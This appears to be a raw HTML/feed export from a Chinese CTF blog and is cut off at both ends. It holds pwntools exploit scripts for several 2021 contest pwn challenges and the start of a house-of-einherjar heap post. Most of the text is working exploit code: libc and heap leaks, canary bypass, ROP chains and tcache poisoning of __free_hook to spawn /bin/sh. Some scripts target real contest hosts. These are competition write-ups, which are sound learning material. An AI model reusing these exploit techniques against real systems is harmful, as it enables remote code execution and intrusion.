class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> cdll</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;Blindbox&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;&gt;&gt; &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">c1,index</span>):</span></span><br><span class="line">    cmd(<span class="number">1</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;&gt;&gt; &#x27;</span>,<span class="built_in">str</span>(c1))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Blindbox(1-3):&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line">    cmd(<span class="number">4</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Index :&#x27;</span>,<span class="built_in">str</span>(index))   </span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Size of Heap : &#x27;</span>,<span class="built_in">str</span>(<span class="built_in">len</span>(content))) </span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Content of heap : &#x27;</span>,content)  </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">2</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;drop?&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">3</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;open?&#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">&#x27;name:&#x27;</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;number?&#x27;</span>,<span class="built_in">str</span>(<span class="number">0x88</span>))</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;number?&#x27;</span>,<span class="built_in">str</span>(<span class="number">0x88</span>))</span><br><span class="line">p.sendlineafter(<span class="string">&#x27;number?&#x27;</span>,<span class="built_in">str</span>(<span class="number">0x88</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    add(<span class="number">1</span>,<span class="number">1</span>)</span><br><span class="line">    free(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">1</span>,<span class="number">1</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">2</span>)</span><br><span class="line">free(<span class="number">1</span>)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;Content of this Blindbox: &#x27;</span>)</span><br><span class="line">libc_base = u64(p.recvuntil(<span class="string">&#x27;\x7e&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)) - <span class="number">0x1ebbe0</span> </span><br><span class="line">log.success(<span class="string">&#x27;libc_base: &#x27;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">lb = cdll.LoadLibrary(<span class="string">&#x27;./libc-2.31.so&#x27;</span>)</span><br><span class="line">lb.srand(<span class="number">0</span>)</span><br><span class="line">choose(<span class="number">6</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">8</span>):</span><br><span class="line">    number = system_addr ^ lb.rand()</span><br><span class="line">    p.sendlineafter(<span class="string">&quot;Please guess&gt;&quot;</span>, <span class="built_in">str</span>(number))</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">美团2021</summary>
    
    
    
    <category term="WriteUp" scheme="https://trick.ink/categories/WriteUp/"/>
    
    
  </entry>
  
  <entry>
    <title>NCTF2021</title>
    <link href="https://trick.ink/article/NCTF2021/"/>
    <id>https://trick.ink/article/NCTF2021/</id>
    <published>2021-11-29T12:52:04.000Z</published>
    <updated>2023-02-09T17:51:22.720Z</updated>
    
    <content type="html"><![CDATA[<h1 id="NCTF2021"><a href="#NCTF2021" class="headerlink" title="NCTF2021"></a>NCTF2021</h1><!-- 文章页 配置 --><h1 id="login"><a href="#login" class="headerlink" title="login"></a>login</h1><h2 id="函数中的syscall调用"><a href="#函数中的syscall调用" class="headerlink" title="函数中的syscall调用"></a>函数中的syscall调用</h2><p>close函数中有调用syscall</p><p><img src="/article/NCTF2021/image-20211129205721889.png" alt="image-20211129205721889"></p><p>题关闭了 <code>stdout</code> 和 <code>stderr</code>, 拿到 shell 后 <code>cat flag&gt;&amp;0</code></p><h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;login1&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;81.69.185.153&#x27;</span>,<span class="number">8011</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">csu</span>(<span class="params">function,rdi,rsi,rdx</span>):</span></span><br><span class="line">    payload = p64(<span class="number">0</span>) + p64(<span class="number">1</span>) + p64(rdi) + p64(rsi) + p64(rdx) + p64(function)</span><br><span class="line">    payload += p64(<span class="number">0x000000000401270</span>)</span><br><span class="line">    <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">main = <span class="number">0x40119a</span></span><br><span class="line">main_read = <span class="number">0x0000000004011ED</span></span><br><span class="line">fake_stack = <span class="number">0x404090</span></span><br><span class="line">read_got = <span class="number">0x404030</span></span><br><span class="line">close_got = <span class="number">0x404028</span></span><br><span class="line">leave = <span class="number">0x40121f</span></span><br><span class="line"></span><br><span class="line">gdb.attach(p,<span class="string">&#x27;b 0x0000000004011E8&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x100</span> + p64(fake_stack+<span class="number">0x100</span>) + p64(main_read) </span><br><span class="line">p.sendafter(<span class="string">&#x27;Welcome to NCTF2021!&#x27;</span>,payload)</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0x00000000040128A</span>)</span><br><span class="line">payload += csu(read_got,<span class="number">0</span>,close_got,<span class="number">1</span>) + p64(<span class="number">0</span>)</span><br><span class="line">payload += csu(read_got,<span class="number">0</span>,fake_stack,<span class="number">0x3b</span>) + p64(<span class="number">0</span>)</span><br><span class="line">payload += csu(close_got,fake_stack,<span class="number">0</span>,<span class="number">0</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0x100</span>,<span class="string">&#x27;\x00&#x27;</span>) + p64(fake_stack-<span class="number">8</span>) + p64(leave)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.send(<span class="string">&#x27;\xf5&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.send(<span class="string">&#x27;/bin/sh\x00&#x27;</span>.ljust(<span class="number">0x3B</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><h1 id="ezheap"><a href="#ezheap" class="headerlink" title="ezheap"></a>ezheap</h1><h2 id="libc-2-33"><a href="#libc-2-33" class="headerlink" title="libc-2.33"></a>libc-2.33</h2><p>申请9个chunk以及一个防止合并的chunk，都free掉之后，8和9都放到unsorted。</p><p>再申请一个chunk，来空出一个tcache位置，再free一次chunk9，就有chunk复用。</p><h2 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;ezheap&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;&gt;&gt; &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line">    cmd(<span class="number">1</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Size: &#x27;</span>,<span class="built_in">str</span>(size))</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Content: &#x27;</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line">    cmd(<span class="number">2</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Index: &#x27;</span>,<span class="built_in">str</span>(index))   </span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Content: &#x27;</span>,content)  </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">3</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Index: &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line">    cmd(<span class="number">4</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;Index: &#x27;</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>): <span class="comment">#0-9</span></span><br><span class="line">    add(<span class="number">0x80</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>):  <span class="comment">#7 tcache ,2 unsorted bin ,1 use chunk</span></span><br><span class="line">    free(i)</span><br><span class="line"></span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">tmp = u64(p.recv(<span class="number">8</span>))</span><br><span class="line">ptr0_11=tmp&gt;&gt;<span class="number">36</span></span><br><span class="line">ptr0_23=((ptr0_11&lt;&lt;<span class="number">24</span>)^tmp)&gt;&gt;<span class="number">24</span></span><br><span class="line">ptr0_35=((ptr0_23&lt;&lt;<span class="number">12</span>)^tmp)&gt;&gt;<span class="number">12</span></span><br><span class="line">heap_base=ptr0_35&lt;&lt;<span class="number">12</span></span><br><span class="line">log.success(<span class="string">&#x27;heap_base: &#x27;</span> + <span class="built_in">hex</span>(heap_base))</span><br><span class="line">show(<span class="number">7</span>)</span><br><span class="line">malloc_hook = u64(p.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>)) - <span class="number">0x10</span> - <span class="number">96</span> </span><br><span class="line">libc_base = malloc_hook - libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">free_hook = libc_base + libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">log.success(<span class="string">&#x27;libc_base: &#x27;</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">&#x27;a&#x27;</span>) <span class="comment">#10  # t=6 tcache malloc one chunk   7 -&gt; 6</span></span><br><span class="line">free(<span class="number">8</span>)</span><br><span class="line">add(<span class="number">0x70</span>,<span class="string">&#x27;bbbb&#x27;</span>) <span class="comment">#11</span></span><br><span class="line"></span><br><span class="line">ptr_addr = heap_base+<span class="number">0x720</span></span><br><span class="line">payload = p64(<span class="number">0</span>) + p64(<span class="number">0x19</span>)</span><br><span class="line">payload += p64(free_hook^(ptr_addr&gt;&gt;<span class="number">12</span>))</span><br><span class="line">add(<span class="number">0x70</span>,payload)   <span class="comment">#12</span></span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">&#x27;/bin/sh\x00&#x27;</span>) <span class="comment">#13</span></span><br><span class="line">add(<span class="number">0x80</span>,p64(system_addr)) <span class="comment">#14</span></span><br><span class="line"></span><br><span class="line">free(<span class="number">13</span>)</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">NCTF2021</summary>
    
    
    
    <category term="WriteUp" scheme="https://trick.ink/categories/WriteUp/"/>
    
    
    <category term="syscall" scheme="https://trick.ink/tags/syscall/"/>
    
  </entry>
  
  <entry>
    <title>安洵杯2021</title>
    <link href="https://trick.ink/article/%E5%AE%89%E6%B4%B5%E6%9D%AF2021/"/>
    <id>https://trick.ink/article/%E5%AE%89%E6%B4%B5%E6%9D%AF2021/</id>
    <published>2021-11-27T13:25:33.000Z</published>
    <updated>2023-02-09T18:04:23.946Z</updated>
    
    <content type="html"><![CDATA[<h1 id="安洵杯2021"><a href="#安洵杯2021" class="headerlink" title="安洵杯2021"></a>安洵杯2021</h1><!-- 文章页 配置 --><h1 id="ezstack"><a href="#ezstack" class="headerlink" title="ezstack"></a>ezstack</h1><p>格式化字符串漏洞+ROP</p><h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">&#x27;linux&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"><span class="comment"># context.arch = &#x27;i386&#x27;</span></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">&#x27;ezstack&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line">    p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line">    p = remote(<span class="string">&#x27;127.0.0.1&#x27;</span>,<span class="number">12345</span>)</span><br><span class="line">    <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p,&#x27;b *$rebase(0xA29)&#x27;)</span></span><br><span class="line"><span class="comment"># gdb.attach(p,&#x27;b *$rebase(0xA5C)&#x27;)</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;%11$p%13$p&#x27;</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;0x&#x27;</span>)</span><br><span class="line">canary = <span class="built_in">int</span>(p.recv(<span class="number">16</span>),<span class="number">16</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;0x&#x27;</span>)</span><br><span class="line">main = <span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>) - <span class="number">240</span></span><br><span class="line"></span><br><span class="line">libc_base = main - libc.sym[<span class="string">&#x27;__libc_start_main&#x27;</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">pop_rdi = libc_base + <span class="built_in">next</span>(libc.search(asm(<span class="string">&#x27;pop rdi\nret&#x27;</span>)))</span><br><span class="line">bin_sh = libc_base + <span class="built_in">next</span>(libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>))</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;--+--&#x27;</span>)</span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span> + p64(canary) + p64(pop_rdi)*<span class="number">2</span> + p64(bin_sh) + p64(system_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>]]></content>
    
    
    <summary type="html">2021安洵杯</summary>
    
    
    
    <category term="WriteUp" scheme="https://trick.ink/categories/WriteUp/"/>
    
    
    <category term="ROP" scheme="https://trick.ink/tags/ROP/"/>
    
    <category term="fmt" scheme="https://trick.ink/tags/fmt/"/>
    
  </entry>
  
  <entry>
    <title>house of einherjar</title>
    <link href="https://trick.ink/article/house%20of%20einherjar/"/>
    <id>https://trick.ink/article/house%20of%20einherjar/</id>
    <published>2021-11-26T11:24:03.000Z</published>
    <updated>2023-02-09T17:56:01.716Z</updated>
    
    <content type="html"><![CDATA[<h1 id="house-of-einherjar"><a href="#house-of-einherjar" class="headerlink" title="house of einherjar"></a>house of einherjar</h1><h1 id="利用原理"><a href="#利用原理" class="headerlink" title="利用原理"></a>利用原理</h1><p><code>free</code> 函数后向（向低地址）合并操作</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* consolidate backward */</span></span><br><span class="line"><span class="keyword">if</span> (!prev_inuse(p)) &#123;</span><br><span class="line">    prevsize = prev_size(p);</span><br><span class="line">    size += prevsize;</span><br><span class="line">    p = chunk_at_offset(p, -((<span class="keyword">long</span>) prevsize));</span><br><span class="line">    unlink(av, p, bck, fwd);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>顺便看看 <code>unlink</code> 源码</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> unlink(AV, P, BK, FD) &#123;                                            \</span></span><br><span class="line">    FD = P-&gt;fd;      \</span><br><span class="line">    BK = P-&gt;bk;      \</span><br><span class="line">    <span class="keyword">if</span> (__builtin_expect (FD-&gt;bk != P || BK-&gt;fd != P, <span class="number">0</span>))      \</span><br><span class="line">      malloc_printerr (check_action, <span class="string">&quot;corrupted double-linked 